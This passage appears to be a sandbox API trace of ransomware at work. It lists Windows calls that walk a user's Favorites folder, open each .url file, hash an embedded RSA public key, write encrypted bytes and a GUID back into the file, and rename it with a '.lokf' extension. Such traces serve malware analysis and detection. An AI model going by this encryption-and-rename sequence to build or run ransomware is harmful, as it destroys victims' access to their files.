HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.717] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.717] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0059.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0059.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.717] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.717] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.717] PathFindFileNameW (pszPath="") returned="" [0059.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.718] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.718] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0059.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0059.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.718] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.721] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.721] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.721] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.722] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.722] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.722] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.722] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.722] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.722] GetLastError () returned 0x0 [0059.723] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.723] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.723] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.723] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.723] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.723] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.723] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.723] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.723] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.723] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.723] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.723] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.723] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.724] CloseHandle (hObject=0x5cc) returned 1 [0059.724] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.724] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.724] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.724] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.lokf")) returned 1 [0059.725] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.725] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.725] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.726] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.726] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0059.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.726] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.726] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0059.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.727] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.727] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.729] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.729] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.730] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.730] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.730] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.730] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.730] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.730] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.730] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.731] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.731] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.731] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.731] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.731] GetLastError () returned 0x0 [0059.731] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.731] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.731] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.731] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.731] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.731] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88298 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85848 [0059.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c882e0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85860 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85890 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858a8 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.732] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85890 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858a8 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c858a8 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85890 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.732] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858a8 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85890 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.733] GetCurrentThreadId () returned 0x9e0 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c845c8 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.733] GetCurrentThreadId () returned 0x9e0 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.733] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85890 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 